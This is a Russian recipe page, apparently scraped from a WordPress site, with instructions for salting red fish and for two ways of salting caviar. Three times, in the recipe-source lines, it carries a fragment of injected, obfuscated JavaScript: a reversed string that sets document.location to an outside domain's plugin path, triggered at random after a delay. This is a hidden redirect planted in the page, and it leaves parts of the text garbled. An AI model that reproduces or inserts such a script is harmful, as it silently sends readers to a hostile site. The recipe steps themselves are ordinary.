Как засолить красную рыбу и икру

Правильное соотношение соли и сахара, минимум специй и время — главный редактор сайта e-da.net Александра Зайцева рассказывает, как правильно засолить красную рыбу и икру, чтобы она получилась вкуснее и полезнее, чем из магазина.

Рыба сёмужного посола

Как засолить красную рыбу и икру. Изображение номер 1

Фото: Александра Зайцева

Как засолить красную рыбу и икру

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

72 ЧАСА

КОЛИЧЕСТВО ПОРЦИЙ:

10 порций

КАЛОРИЙНОСТЬ:

341 ккал

341 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Лосось (нерка, кета, кижуч, чавыча)

1 шт.

Соль

⅔ стакана

Сахар

⅓ стакана

  1. Возьмите свежую или мороженую красную рыбу. Очистите от костей, внутренностей, плавников.
  2. Смешайте соль и сахар. Количество зависит от размера рыбы — на среднюю рыбу понадобится ровно стакан смеси сахара и соли. Главное — соблюдать пропорции к рыбе: 1:3. По вкусу можно добавить чёрный перец, чеснок, лавровый лист или сушёный укроп.
  3. Натрите рыбу солью снаружи и изнутри и заверните в ткань или пергаментную бумагу.
  4. Если рыба была свежая — отправьте её в морозилку минимум на трое суток. Затем переложите в холодильник оттаивать ещё на столько же, переворачивая с бока на бок каждый день. Если рыба была замороженная, то отправьте её сразу в холодильник на трое суток.

Икра-пятиминутка

Как засолить красную рыбу и икру. Изображение номер 2

Фото: Александра Зайцева

Как засолить красную рыбу и икру

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

20 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

4 порции

КАЛОРИЙНОСТЬ:

268 ккал

268 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Красная икра

400 г

Соль

300 г

Вода

800 мл

Перец

по вкусу

Соль

по вкусу

  1. Сначала приготовьте тузлук (очень крепкий рассол): возьмите на литр воды 300—400 граммов мелкой соли и доведите рассол до кипения.
  2. Залейте икру тузлуком и оставьте на 5—7 минут.
  3. Если икра была в ястыках (плёночных мешочках), то очистите их с помощью вилки или пинцета, при этом икринки должны всплыть.
  4. Переложите икру в банку. Приготовленная таким способом икра может храниться до 10 дней.

Икра солёная в банке

Как засолить красную рыбу и икру

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

4 ЧАСА 30 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

4 порции

КАЛОРИЙНОСТЬ:

206 ккал

206 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Красная икра

300 г

Соль

½ стакана

Вода

1 л

Сахар

1 ч. л.

Растительное масло

1 ч. л.

  1. Отделите икру от ястыков (плёночного мешочка, в котором находится икра): для этого положите их в дуршлаг или крупное сито, обдайте терпимо горячей водой и  руками снимите плёнку. Освобождённые икринки будут проваливаться через отверстия в дуршлаге или сите.
  2. Сварите тузлук: залейте соль водой, доведите до кипения и остудите до 40 градусов. Добавьте сахар и перемешайте.
  3. Залейте икру тузлуком на час.
  4. Слейте воду, откиньте икру в марлю и оставьте на три часа, чтобы вся вода стекла.
  5. Разложите икру по банкам, добавьте сверху немного масла и закройте крышкой.

Ещё больше вкусных и полезных рецептов ищите на сайте e-da.net.

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector